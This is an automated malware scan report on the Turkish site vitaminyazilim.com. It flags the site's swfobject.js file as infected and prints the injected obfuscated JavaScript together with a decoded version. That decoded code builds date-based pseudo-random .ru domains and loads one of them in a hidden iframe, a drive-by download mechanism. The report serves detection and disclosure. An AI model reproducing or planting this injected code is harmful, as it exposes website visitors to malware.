Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vitaminyazilim.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vitaminyazilim.com/ | 200 OK Content-Length: 12375 Content-Type: text/html | clean |
http://vitaminyazilim.com/swfobject.js | 200 OK Content-Length: 13358 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object(); deconcept.SWFObject = function(swf, id, w, h, ver, c, useExpressInstall, quality, xiRedirectUrl, redirectUrl, detectKey){ if (!document.getElementById) { return; } this.DETECT_KEY = detectKey ? detectKey : 'detectflash'; this.skipDetect = deconc r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));} if(f)e(s); Decoded script: function nextRandomNumber(){var hi=this.seed/this.Q;var lo=this.seed%this.Q;var test=this.A*lo-this.R*hi;if(test>0){this.seed=test}else{this.seed=test+this.M}return(this.seed*this.oneOverM)}function RandomNumberGenerator(unix){var d=new Date(unix*1000);var s=d.getHours()>12?1:0;this.seed=2345678901+(d.getMonth()*0xFFFFFF)+(d.getDate()*0xFFFF)+(Math.round(s*0xFFF));this.A=48271;this.M=2147483647;this.Q=this.M/this.A;this.R=this.M%this.A;this.oneOverM=1.0/this.M;this.next=nextRandomNumb var domainName = generatePseudoRandomString(unix, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ Antivirus reports:
| ||
http://vitaminyazilim.com/Default.aspx | 200 OK Content-Length: 12375 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=69 | 200 OK Content-Length: 5258 Content-Type: text/html | clean |
http://vitaminyazilim.com/Contact.aspx | 200 OK Content-Length: 6650 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=76 | 200 OK Content-Length: 10327 Content-Type: text/html | clean |
http://vitaminyazilim.com/WebResource.axd?d=p4wrJdeziKavF9pXkQWRD7MiQj9ywl-kKpEDZICy-WPJydC4_0eLmy2WZX8GhR3Wc2cnEFyjKp0o3GaRDR01RNcFe481&t=634605294834856163 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://vitaminyazilim.com/WebResource.axd?d=3ehzONPtbK85E5d5814USDqM-sEMmyLKNzYiaUEL14Jo6kFRSOlu1vJu4wA8vdGFFiR4cjm_GSQ2s_deOGDQVOYDTJE1&t=634605294834856163 | 200 OK Content-Length: 33247 Content-Type: application/x-javascript | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=71 | 200 OK Content-Length: 15306 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=72 | 200 OK Content-Length: 12313 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=74 | 200 OK Content-Length: 10072 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=73 | 200 OK Content-Length: 9825 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=50 | 200 OK Content-Length: 10159 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=51 | 200 OK Content-Length: 13067 Content-Type: text/html | clean |
http://vitaminyazilim.com/Content.aspx?ContentID=52 | 200 OK Content-Length: 11284 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vitaminyazilim.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 25 Feb 2015 05:30:22 GMT
Server: Microsoft-IIS/7.0
Content-Length: 12375
Content-Type: text/html; charset=windows-1254
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...12375 bytes of data.
GET / HTTP/1.1
Host: vitaminyazilim.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 25 Feb 2015 05:30:22 GMT
Server: Microsoft-IIS/7.0
Content-Length: 12375
Content-Type: text/html; charset=windows-1254
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...12375 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vitaminyazilim.com
Referer: http://www.google.com/search?q=vitaminyazilim.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vitaminyazilim.com
Referer: http://www.google.com/search?q=vitaminyazilim.com
Result:
The result is similar to the first query. There are no suspicious redirects found.